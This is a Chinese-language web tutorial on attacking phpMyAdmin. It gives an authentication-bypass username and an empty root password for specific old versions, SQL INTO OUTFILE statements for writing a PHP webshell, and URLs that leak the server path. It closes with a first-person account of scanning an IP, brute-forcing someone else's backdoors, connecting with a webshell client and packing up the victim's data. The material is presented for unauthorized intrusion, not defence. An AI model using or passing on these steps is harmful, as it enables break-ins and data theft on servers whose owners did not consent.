分析PHPmyadmin漏洞以及拿shell的介绍
phpmyadmin的漏洞相对来说,还是比较多的,对于新手来说,分享几个漏洞,深入的处于代码审计方面的也可以和我讨论
phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码,直接使用‘localhost’@'@”为账号,密码不用输入。
phpmyadmin2.11.9.2 这个版本存在空口令。直接root用户登陆,密码不用
找这个的话 用自己的写的脚本,或者搜素引擎什么的,这里懂的人就懂了,不懂也不在这里。
关于拿shell,----》root权限,并且有写文件权限 ----》导出的目录有写权限 ----》有的情况下,就算你这两个都有,但是服务器的一些配置还是会对这个有影响。
在getshell之前先进入一个数据库
第一种,使用sql语句,创建一个表,添加一个字段,字段的内容为一句话,然后导出到php文件中,最后删除这个表,这个是最保险的方法
Create TABLE 表 (列 text NOT NULL)
Insert INTO 表 (列) VALUES('')
select 列 from 表 into _utfile '路径'
Drop TABLE IF EXISTS 表;
第二种方法,这个是直接写入
select '一句话'INTO _UTFILE '路径'
还有几种方法,大致原理都一样。
然后,一般的话,一句话都是
有狗的话,用免杀一句话,下面这个是我过年前构造的过狗一句话,现在应该还可以过
找路径的话,
1// 利用phpinfo.php 2//利用phpmyadmin的一些文件报错,下面都是网上通用的 /phpMyAdmin/index.php?lang[]=1 /phpMyAdmin/phpinfo.php /load_file() /phpmyadmin/themes/darkblue_orange/layout.inc.php /phpmyadmin/libraries/select_lang.lib.php /phpmyadmin/libraries/lect_lang.lib.php /phpmyadmin/libraries/mcrypt.lib.php /phpmyadmin/libraries/export/xls.php
3//再者就是利用网站包路径,这些会的都会了,不会的慢慢的就会了。
下面开始实战,脚本扫到一个IP,显示存在phpmyadmin,打开

一看这些php文件就是后门一句话,放到几万字典爆破,两秒钟

直接菜刀链接。。。。。
这个肯定被人搞了,直接打包好东西,你懂的。。。提权什么的就不必要了。

您可能感兴趣的文章
- 12-31hiredis从安装到项目实战操作
- 12-31phpmyadmin登录时怎么指定服务器ip和端口
- 12-31MySQL线上死锁分析实战
- 12-31MySQL 触发器的使用和理解
- 12-31MySQL 字段默认值该如何设置
- 12-31Redis主从同步配置的方法步骤(图文)
- 12-31MySQL 字符串拆分操作(含分隔符的字符串截取)
- 12-31redis 交集、并集、差集的具体使用
- 12-31MySQL精讲之二:DML数据操作语句
- 12-31PostgreSQL判断字符串是否包含目标字符串的多种方法


阅读排行
推荐教程
- 12-23PL/SQL登录Oracle数据库报错ORA-12154:TNS:无法解析指定的连接标识符
- 12-23使用imp和exp命令对Oracle数据库进行导入导出操作详解
- 12-11mysql代码执行结构实例分析【顺序、分支、循环结构】
- 12-08添加mysql的用户名和密码是什么语句?
- 12-23详解Oracle游标的简易用法
- 12-20PhpMyAdmin出现错误数据无法导出怎么办?
- 12-19Redis中实现查找某个值的范围
- 12-15浅析mysql迁移到clickhouse的5种方法
- 12-15CentOS7 64位下MySQL5.7安装与配置教程
- 12-14Mysql大型SQL文件快速恢复方案分享





